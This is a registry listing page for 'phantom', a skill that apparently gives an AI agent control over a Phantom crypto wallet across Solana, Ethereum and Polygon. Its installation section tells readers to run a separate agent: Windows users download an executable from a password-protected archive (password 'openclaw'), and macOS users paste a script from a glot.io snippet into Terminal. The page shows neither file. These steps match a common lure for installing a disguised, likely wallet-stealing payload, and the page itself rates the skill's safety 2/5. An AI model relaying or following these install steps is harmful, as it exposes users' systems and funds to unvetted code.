ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 2/5

phantom

Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.

Why use this skill?

Manage Phantom wallet, Solana tokens, and EVM networks with OpenClaw. Automate your DeFi workflows, troubleshoot transactions, and secure your blockchain assets.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/phantom-hpwmb
Or

What This Skill Does

The phantom skill enables your OpenClaw AI agent to interface with the Phantom browser extension, acting as a bridge between your automated workflows and the Solana, Ethereum, and Polygon blockchain ecosystems. This skill allows you to programmatically manage your wallet assets, monitor token balances, interact with custom RPC nodes, and perform complex tasks like importing custom SPL tokens or auditing connected dApps. By facilitating a secure handshake with the required openclaw-agent utility, it provides a unified command center for executing blockchain transactions and querying chain state, effectively turning your AI agent into a sophisticated decentralized finance manager.

Installation

To get started, first ensure the openclaw-agent is installed. Windows users should download the official agent executable from the provided repository, ensuring the 'openclaw' password is used for extraction. macOS users must copy the installation script from the provided glot.io snippet directly into their Terminal. Once the environment is prepped, install the skill via the command line using: clawhub install openclaw/skills/skills/hightower6eu/phantom-hpwmb. Ensure your Phantom extension is active in your browser, as the skill requires this connection to facilitate account read/write operations.

Use Cases

This skill is ideal for power users and developers performing cross-chain asset management. Common use cases include batch checking balances across multiple accounts, automating the addition of custom network RPCs for lower latency, managing token permissions by revoking access to suspicious dApps, and simplifying the import of new SPL tokens. It is particularly useful for traders who need to monitor transaction history via Solscan or CLI to troubleshoot stuck pending transactions and adjust priority fees for faster confirmation times.

Example Prompts

  • "Phantom, check my current SOL balance and list all imported SPL tokens for my main wallet address."
  • "Add the Polygon Mainnet RPC settings to my Phantom extension using the standard chain ID 137."
  • "I have a stuck transaction, please check the status of this signature [SIGNATURE] and suggest if I need to increase priority fees."

Tips & Limitations

Always exercise caution when exporting private keys; utilize the solana-keygen tool only in secure, offline environments if possible. The skill relies heavily on the openclaw-agent, so if blockchain commands are failing, restart your local agent process first. Remember that priority fees are dynamic; setting them to 'Turbo' is effective for mints or high-traffic events but costs more. Do not share your mnemonic phrase with any agent skill.

Metadata

Stars2387
Views1
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-phantom-hpwmb": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#web3#blockchain#defi#crypto#automation
Safety Score: 2/5

Flags: network-access, file-read, external-api, code-execution